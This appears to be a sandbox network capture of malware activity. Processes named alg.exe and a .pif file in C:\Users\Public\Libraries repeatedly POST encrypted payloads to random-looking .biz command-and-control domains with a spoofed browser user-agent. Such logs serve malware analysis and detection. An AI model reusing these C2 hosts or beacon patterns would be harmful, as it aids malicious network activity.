Nov 1, 2024 08:24:11.093061924 CET | 802 | OUT | Data Raw: 98 0d 2e 3b f3 9c e0 4a 16 03 00 00 41 57 fa ef 98 14 56 ae 1a 98 18 cb 81 a5 59 c8 75 99 c2 21 8a c5 ea 36 9a 32 d5 bd 03 fd 5a c3 f2 70 b1 d1 b9 e8 78 cc 96 a2 49 55 60 00 64 0c 24 67 b3 b1 60 fb 74 7b aa 8b af b9 5d 45 4a 09 25 d4 08 cb 29 12
                                                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: .;JAWVYu!62ZpxIU`d$g`t{]EJ%)X\'S4S~Q[X!R4,6aR*8fd[8K/136tc#tKf(*.1wg|-n^qW-x>l?B=^.g5>O
Nov 1, 2024 08:24:12.560075998 CET | 416 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                                                                        Server: nginx
                                                                                                                                                                                                                                                                                                                                                                                                                        Date: Fri, 01 Nov 2024 07:24:12 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                        Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                                                                                                                                                                                        Set-Cookie: btst=f3a8f69c2ee9a903e23db7f78bd7e9da|173.254.250.82|1730445852|1730445852|0|1|0; path=/; domain=.acwjcqqv.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                                                                                                                                                                                                                                        Set-Cookie: snkz=173.254.250.82; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                        Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
62 | 192.168.2.8 | 49778 | 44.221.84.105 | 80 | 4916 | C:\Windows\System32\alg.exe
Timestamp | Bytes transferred | Direction | Data
Nov 1, 2024 08:24:12.077753067 CET | 350 | OUT | POST /wstlg HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                                                                        Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                        Host: bumxkqgxu.biz
                                                                                                                                                                                                                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                                                                                                                                        Content-Length: 778
Nov 1, 2024 08:24:12.077768087 CET | 778 | OUT | Data Raw: 22 9d ab 36 e4 99 30 77 fe 02 00 00 42 66 ad 39 b7 a7 3e ec 39 2f bf 86 dd 7b af 38 e8 c1 a4 2f 73 93 3c 07 ab 1a c1 80 64 69 48 d4 27 bf c5 42 b2 43 33 e7 69 76 5f 8b 1c dc 12 f9 c5 8c c9 6d 13 35 9a 39 58 c9 ce 5e 00 ab 07 17 d4 6a eb f7 79 a3
                                                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: "60wBf9>9/{8/s<diH'BC3iv_m59X^jy/f}'*06y$g>[C]CA<D9XPdZ1sPT#^^7fi9aM\h?([~Up+f=5mPy4>[b)n9G6Kf|
Nov 1, 2024 08:24:12.732904911 CET | 417 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                                                                        Server: nginx
                                                                                                                                                                                                                                                                                                                                                                                                                        Date: Fri, 01 Nov 2024 07:24:12 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                        Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                                                                                                                                                                                        Set-Cookie: btst=92618c95f6596a4354292859ee99781c|173.254.250.82|1730445852|1730445852|0|1|0; path=/; domain=.bumxkqgxu.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                                                                                                                                                                                                                                        Set-Cookie: snkz=173.254.250.82; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                        Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
63 | 192.168.2.8 | 49779 | 18.246.231.120 | 80 | 4536 | C:\Users\Public\Libraries\wdmvmswJ.pif
Timestamp | Bytes transferred | Direction | Data
Nov 1, 2024 08:24:12.614274979 CET | 343 | OUT | POST /sn HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                                                                        Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                        Host: vyome.biz
                                                                                                                                                                                                                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                                                                                                                                        Content-Length: 802
Nov 1, 2024 08:24:12.614293098 CET | 802 | OUT | Data Raw: 81 56 05 5e 54 e1 9a 3c 16 03 00 00 94 2b e5 58 df d4 15 71 e8 67 45 71 1e c9 53 24 1d 59 94 a3 87 68 0a fc 39 66 47 f2 ac ac 94 d2 31 c7 3a da 48 1d 6d b6 48 fc 61 7c c6 26 1d ee 7e 4e 51 99 bf 0a 89 9e ee bb f1 c9 a5 83 ac 51 02 f3 66 0d 14 2c
                                                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: V^T<+XqgEqS$Yh9fG1:HmHa|&~NQQf,SB1jSmOE?BcxD~*vJM4)*xmIEs$sZe1z+opbJ(A5%oSb:XE}m[|uZ
Nov 1, 2024 08:24:13.525759935 CET | 413 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                                                                        Server: nginx
                                                                                                                                                                                                                                                                                                                                                                                                                        Date: Fri, 01 Nov 2024 07:24:13 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                        Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                                                                                                                                                                                        Set-Cookie: btst=c758d7e7fcf2ec1018d8e01913ad54a3|173.254.250.82|1730445853|1730445853|0|1|0; path=/; domain=.vyome.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                                                                                                                                                                                                                                        Set-Cookie: snkz=173.254.250.82; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                        Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
64 | 192.168.2.8 | 49780 | 54.244.188.177 | 80 | 4916 | C:\Windows\System32\alg.exe
Timestamp | Bytes transferred | Direction | Data
Nov 1, 2024 08:24:13.085887909 CET | 350 | OUT | POST /ohrgkx HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                                                                        Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                        Host: dwrqljrr.biz
                                                                                                                                                                                                                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                                                                                                                                        Content-Length: 778
Nov 1, 2024 08:24:13.085908890 CET | 778 | OUT | Data Raw: 2c fe 2b 67 58 c6 2c 96 fe 02 00 00 a7 f7 2f f9 da f2 05 0c 74 f2 cf e6 1c 9a a4 41 2e 71 21 66 94 9b 1c 18 bf 61 ea 3b 18 dc 7b 31 ff 53 7c 8d 0f fb 4b 8c 6a 0b 92 e4 9a 82 e6 3d 66 ae 0f e2 34 91 88 95 10 40 05 00 6a 93 7e ff 86 9c ed 94 d7 ae
                                                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: ,+gX,/tA.q!fa;{1S|Kj=f4@j~ykVSYQxv7;Jya!B+d$F. ivs4_edGKuv_C`GE?xrM<kn&w#!tB9fV4b
Nov 1, 2024 08:24:13.917217016 CET | 416 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                                                                        Server: nginx
                                                                                                                                                                                                                                                                                                                                                                                                                        Date: Fri, 01 Nov 2024 07:24:13 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                        Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                                                                                                                                                                                        Set-Cookie: btst=e24240737c22977feae3f8ee92893f69|173.254.250.82|1730445853|1730445853|0|1|0; path=/; domain=.dwrqljrr.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                                                                                                                                                                                                                                        Set-Cookie: snkz=173.254.250.82; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                        Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
65 | 192.168.2.8 | 49781 | 18.208.156.248 | 80 | 4536 | C:\Users\Public\Libraries\wdmvmswJ.pif
Timestamp | Bytes transferred | Direction | Data
Nov 1, 2024 08:24:13.840864897 CET | 357 | OUT | POST /ovauxeggsejjr HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                                                                        Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                        Host: yauexmxk.biz
                                                                                                                                                                                                                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                                                                                                                                        Content-Length: 802
Nov 1, 2024 08:24:13.840883017 CET | 802 | OUT | Data Raw: 4b 9e 0f 30 62 3d c6 89 16 03 00 00 2d 85 60 90 5b bf e6 8e 4b ae 16 b5 77 91 de 43 27 5f 70 cd 1c 14 75 90 33 69 da bc 05 79 09 7d 01 e3 6f 51 5e f1 a9 2c 7a 33 53 60 f1 0f eb 1d 90 97 b0 58 13 2b 45 0b c0 02 ec ad 75 98 19 d8 80 ae f1 a5 cc bd
                                                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: K0b=-`[KwC'_pu3iy}oQ^,z3S`X+EuVC^mSn'Rv8E+HfG[-5-oA*qHJPry]KM{kkJX[pwq5uyx6Ojm<khgb9bO*
Nov 1, 2024 08:24:14.499131918 CET | 416 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                                                                        Server: nginx
                                                                                                                                                                                                                                                                                                                                                                                                                        Date: Fri, 01 Nov 2024 07:24:14 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                        Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                                                                                                                                                                                        Set-Cookie: btst=d460f99b663a989b762fafb893fac4c9|173.254.250.82|1730445854|1730445854|0|1|0; path=/; domain=.yauexmxk.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                                                                                                                                                                                                                                        Set-Cookie: snkz=173.254.250.82; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                        Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
66 | 192.168.2.8 | 49782 | 35.164.78.200 | 80 | 4916 | C:\Windows\System32\alg.exe

Timestamp | Bytes transferred | Direction | Data
Nov 1, 2024 08:24:14.291610003 CET | 348 | OUT | POST /vekxop HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
Host: nqwjmb.biz
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
Content-Length: 778
Nov 1, 2024 08:24:14.291623116 CET | 778 | OUT | Data Raw: 35 13 6c f7 40 92 49 8f fe 02 00 00 ea c5 2d 1a ab fd e5 0b 34 a2 ae ff 66 9a d4 78 f4 5b 3a 48 4e 42 c6 0e 65 5d ce ad 02 6f 09 b2 3b d8 3e ce 0a 48 51 b9 6d af b0 13 ad c8 65 6b 41 c8 52 37 95 5a 00 21 61 f6 22 64 47 b3 d3 d5 ca dd 1e 4f 91 d9
Nov 1, 2024 08:24:15.129843950 CET | 414 | IN | HTTP/1.1 200 OK
Server: nginx
Date: Fri, 01 Nov 2024 07:24:15 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: close
Set-Cookie: btst=c36b4ca13890bcef0ec806fa9fdf7790|173.254.250.82|1730445855|1730445855|0|1|0; path=/; domain=.nqwjmb.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
Set-Cookie: snkz=173.254.250.82; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
Data Raw: 30 0d 0a 0d 0a
Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
67 | 192.168.2.8 | 49783 | 13.251.16.150 | 80 | 4536 | C:\Users\Public\Libraries\wdmvmswJ.pif

Timestamp | Bytes transferred | Direction | Data
Nov 1, 2024 08:24:14.538604021 CET | 350 | OUT | POST /gblgywtx HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
Host: iuzpxe.biz
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
Content-Length: 802
Nov 1, 2024 08:24:14.538624048 CET | 802 | OUT | Data Raw: 07 e7 b0 0a 09 58 38 1b 16 03 00 00 9c 4c 76 e4 31 6d b7 a8 93 07 b0 c5 a0 fe a6 f5 62 f2 98 64 f3 93 2e 67 32 28 55 14 f2 7b c5 4d 3f 32 60 10 14 9c 85 80 37 78 be 13 09 5e 4d 27 c7 cf 1c d1 36 94 e9 76 5d 44 ef 72 73 96 af cf 86 01 46 9f 62 f7


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
68 | 192.168.2.8 | 49784 | 13.251.16.150 | 80 | 4536 | C:\Users\Public\Libraries\wdmvmswJ.pif

Timestamp | Bytes transferred | Direction | Data
Nov 1, 2024 08:24:15.136745930 CET | 347 | OUT | POST /bjgrt HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
Host: iuzpxe.biz
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
Content-Length: 802
Nov 1, 2024 08:24:15.136853933 CET | 802 | OUT | Data Raw: ae 9b b9 1b 78 c9 c9 5d 16 03 00 00 17 46 42 85 ec 5f a0 24 f3 4b 13 db b7 8d 13 b3 90 cd 69 5a 70 9b 88 2b 3c d7 53 06 31 f0 47 eb 87 d3 d8 e0 ed a2 ed 0e 7d 15 3e 5c da 30 c2 0e 28 62 9e 31 fe 36 b7 84 95 60 ec f5 34 f4 53 62 42 8d df 5f d8 54
Nov 1, 2024 08:24:16.561320066 CET | 414 | IN | HTTP/1.1 200 OK
Server: nginx
Date: Fri, 01 Nov 2024 07:24:16 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: close
Set-Cookie: btst=a3a3b9c3c8c79292dd13d833c3250245|173.254.250.82|1730445856|1730445856|0|1|0; path=/; domain=.iuzpxe.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
Set-Cookie: snkz=173.254.250.82; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
Data Raw: 30 0d 0a 0d 0a
Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
69 | 192.168.2.8 | 49785 | 3.94.10.34 | 80 | 4916 | C:\Windows\System32\alg.exe

Timestamp | Bytes transferred | Direction | Data
Nov 1, 2024 08:24:15.828222990 CET | 354 | OUT | POST /tpndpotka HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
Host: ytctnunms.biz
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
Content-Length: 778
Nov 1, 2024 08:24:15.828263044 CET | 778 | OUT | Data Raw: a3 6c aa d1 a6 7b 6f e9 fe 02 00 00 fc 31 a8 e8 dc 8f 5e 80 ed 27 0d 42 ce ec 40 e3 df 54 73 8d 64 85 e5 ca 9d e1 7e ff e6 af cc 75 cd 25 b4 96 9f fb f7 80 a4 6f 33 c4 c0 63 00 25 b4 ea e9 d4 c6 c2 2d 0f 6f 49 4d c3 47 74 b1 1c 62 a9 6f d0 c7 c8
                                                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: l{o1^'B@Tsd~u%o3c%-oIMGtbo"HVC'm7mCXC)/kK_$M1}by{hUmuvxzW3g7qHUfRz=V [^f+`zo8nkL4$6
Nov 1, 2024 08:24:16.492218971 CET | 417 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                                                                        Server: nginx
                                                                                                                                                                                                                                                                                                                                                                                                                        Date: Fri, 01 Nov 2024 07:24:16 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                        Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                                                                                                                                                                                        Set-Cookie: btst=622c1b39db08f0edd64cdef7623aa7d6|173.254.250.82|1730445856|1730445856|0|1|0; path=/; domain=.ytctnunms.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                                                                                                                                                                                                                                        Set-Cookie: snkz=173.254.250.82; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                        Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
70 | 192.168.2.8 | 49786 | 13.251.16.150 | 80 | 4536 | C:\Users\Public\Libraries\wdmvmswJ.pif
Timestamp | Bytes transferred | Direction | Data
Nov 1, 2024 08:24:16.846225023 CET | 349 | OUT | POST /dona HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                                                                        Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                        Host: sxmiywsfv.biz
                                                                                                                                                                                                                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                                                                                                                                        Content-Length: 802
Nov 1, 2024 08:24:16.846240044 CET | 802 | OUT | Data Raw: 6c 7f 8e 79 a3 d0 f8 62 16 03 00 00 1a 18 6c 08 cf ac 0a 08 e4 1f bc 3b aa 96 74 7a ee 8a 3f f5 a1 79 79 a3 15 ba 50 c8 88 02 e4 57 af 68 a7 66 90 d4 59 d5 be f5 91 ca 6e f2 84 0b 0a fa 51 ab 61 1d db 16 e9 85 8d 60 95 e6 af ca 06 0a 0c 6c 43 42
                                                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: lybl;tz?yyPWhfYnQa`lCBa?5=K%at*&kK =jo>fCn6s\X>n@*zJQTN:N#gFA1@~<K ]gP_O5dXu?7
Nov 1, 2024 08:24:18.288188934 CET | 417 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                                                                        Server: nginx
                                                                                                                                                                                                                                                                                                                                                                                                                        Date: Fri, 01 Nov 2024 07:24:18 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                        Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                                                                                                                                                                                        Set-Cookie: btst=fce488f59759cde4eb705c5405004dc7|173.254.250.82|1730445858|1730445858|0|1|0; path=/; domain=.sxmiywsfv.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                                                                                                                                                                                                                                        Set-Cookie: snkz=173.254.250.82; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                        Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
71 | 192.168.2.8 | 49787 | 165.160.15.20 | 80 | 4916 | C:\Windows\System32\alg.exe
Timestamp | Bytes transferred | Direction | Data
Nov 1, 2024 08:24:16.998948097 CET | 352 | OUT | POST /qylgmshijgs HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                                                                        Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                        Host: myups.biz
                                                                                                                                                                                                                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                                                                                                                                        Content-Length: 778
Nov 1, 2024 08:24:16.998982906 CET | 778 | OUT | Data Raw: 46 f0 ae 76 87 c6 a6 5b fe 02 00 00 a7 8d 6d c7 a8 ad ec b8 a7 e1 e4 c2 ca 33 a4 d0 77 4e 7f 9c 72 46 7f 2e d1 1a 41 da c2 0b c1 c9 f5 d7 1a bf ae 88 2e 50 11 34 52 6d fe 37 1a d4 9e d1 7c 59 0b 54 e7 f9 fd 1e d6 22 ce fd 1f 79 7e fb 5b c5 30 e5
                                                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: Fv[m3wNrF.A.P4Rm7|YT"y~[0m1aLRlt#,kPA{225qeRr}R+4e$JKa;TI'_3D[8T~H5+c>Q[q {^IKT\U"^7',U#yoKH$]{S=;
Nov 1, 2024 08:24:17.694458008 CET | 170 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                                                                        Date: Fri, 01 Nov 2024 07:24:17 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                        Content-Length: 94
                                                                                                                                                                                                                                                                                                                                                                                                                        Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 3c 2f 74 69 74 6c 65 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 65 76 69 73 65 64 22 20 63 6f 6e 74 65 6e 74 3d 22 31 2e 31 2e 37 22 20 2f 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: <html><head><title></title><meta name="revised" content="1.1.7" /></head><body></body></html>
Nov 1, 2024 08:24:17.816380978 CET | 344 | OUT | POST /nur HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                                                                        Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                        Host: myups.biz
                                                                                                                                                                                                                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                                                                                                                                        Content-Length: 778
Nov 1, 2024 08:24:17.816416979 CET | 778 | OUT | Data Raw: d6 50 1c 3e ba 4a 7c 74 fe 02 00 00 04 3a 8c 68 44 0b 3c 6f 50 03 f8 02 eb 73 a5 0e 6f 3e b7 b4 88 2a 48 21 af 81 be c6 9f 86 af 64 94 1f c7 e3 ee e1 8c 3b 82 cb 83 04 cf bc fe 68 87 82 a7 22 f8 b0 6f a6 1c b7 ae 97 de ec 78 bb 2b ba bc f8 69 01
                                                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: P>J|t:hD<oPso>*H!d;h"ox+ii5-BciD#|*jey 6I?4jlA1N_}PpIS[LHQx~=hVCI ,mV+.![Y$jE_u)`,!HF\FA
Nov 1, 2024 08:24:17.992285967 CET | 170 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                                                                        Date: Fri, 01 Nov 2024 07:24:17 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                        Content-Length: 94
                                                                                                                                                                                                                                                                                                                                                                                                                        Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 3c 2f 74 69 74 6c 65 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 65 76 69 73 65 64 22 20 63 6f 6e 74 65 6e 74 3d 22 31 2e 31 2e 37 22 20 2f 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: <html><head><title></title><meta name="revised" content="1.1.7" /></head><body></body></html>


Session ID  Source IP    Source Port  Destination IP  Destination Port  PID   Process
72          192.168.2.8  49788        54.244.188.177  80                4916  C:\Windows\System32\alg.exe
Timestamp                           Bytes transferred  Direction  Data
Nov 1, 2024 08:24:18.142719030 CET  356                OUT        POST /wveyxjtgsxs HTTP/1.1
    Cache-Control: no-cache
    Connection: Keep-Alive
    Pragma: no-cache
    Host: oshhkdluh.biz
    User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
    Content-Length: 778
Nov 1, 2024 08:24:18.142733097 CET  778                OUT        Data Raw: 68 be cc 26 7d 73 0b 8b fe 02 00 00 9b ea 27 dc fc 51 33 e5 4c 1b a7 94 11 e8 31 e6 4a df ce e4 9a e7 b0 03 37 af 0e 4d fb af dd 2d 23 26 8c a2 46 0f ca 93 a8 1b 7e 10 20 ec 39 90 65 e8 9b 6d 68 f5 71 1b 5e 8b 48 1b 74 c1 6d 08 5a ee 80 6d 67 62
Nov 1, 2024 08:24:18.998892069 CET  417  IN  HTTP/1.1 200 OK
    Server: nginx
    Date: Fri, 01 Nov 2024 07:24:18 GMT
    Content-Type: text/html
    Transfer-Encoding: chunked
    Connection: close
    Set-Cookie: btst=bd79a56d0c44f8ef144d739ce3c83a46|173.254.250.82|1730445858|1730445858|0|1|0; path=/; domain=.oshhkdluh.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
